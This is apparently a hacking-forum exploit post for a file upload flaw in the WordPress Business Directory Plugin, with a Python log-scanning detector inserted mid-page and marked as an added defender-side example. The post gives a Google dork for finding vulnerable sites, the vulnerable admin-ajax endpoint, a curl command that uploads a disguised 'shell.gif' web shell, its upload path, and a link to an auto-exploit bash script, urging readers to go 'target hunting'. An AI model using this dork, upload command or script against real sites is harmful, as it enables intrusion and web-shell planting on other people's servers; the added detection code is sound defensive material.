WordPress Business Directory Plugin File Upload - Lulz Cyber

WordPress Business Directory Plugin File Upload


Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Upload your file in .gif/.jpg/.png format.

Your uploaded file can be found at:
http://target.com//wp-content/uploads/2017/06/shell.gif
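
A defender-side check for the requests shown above, as an added example that is not part of the original post: it scans web server access logs for POSTs to the wpbdp-file-field-upload action and for later requests under /wp-content/uploads/ from the same client. Combined Log Format is assumed, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_ACTION = "wpbdp-file-field-upload"  # action name given in the post

def split_target(target):
    """Split a request target by hand; urlsplit() would read a leading '//'
    (as in the post's upload URL) as a host name."""
    path, _, query = target.partition("?")
    return path, parse_qs(query)

def is_upload_request(method, target):
    """True for a POST to admin-ajax.php carrying the plugin's upload action."""
    path, params = split_target(target)
    return (method == "POST" and path.endswith("/wp-admin/admin-ajax.php")
            and UPLOAD_ACTION in params.get("action", []))

def find_upload_activity(lines):
    """Return (uploads, follow_ups): upload POSTs, plus later requests under
    /wp-content/uploads/ from a client that sent such a POST earlier."""
    uploads, follow_ups, uploaders = [], [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, path = m["ip"], split_target(m["target"])[0]
        if is_upload_request(m["method"], m["target"]):
            uploads.append((ip, m["time"], m["status"]))
            uploaders.add(ip)
        elif ip in uploaders and "/wp-content/uploads/" in path:
            follow_ups.append((ip, m["time"], path))
    return uploads, follow_ups

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jun/2017:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload HTTP/1.1" 200 312 "-" "curl/7.52.1"',
    '198.51.100.7 - - [12/Jun/2017:10:01:09 +0000] "GET //wp-content/uploads/2017/06/shell.gif HTTP/1.1" 200 43 "-" "curl/7.52.1"',
    '203.0.113.20 - - [12/Jun/2017:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [12/Jun/2017:10:02:05 +0000] "GET /wp-content/uploads/2017/06/logo.png HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for kind, hits in zip(("upload POST", "follow-up fetch"), find_upload_activity(SAMPLE_LOG)):
        print(kind, hits)
```

A hit on the upload action is a lead to review, since the access log alone does not show whether the request came from a logged-in user.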


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Okay, happy target hunting :D
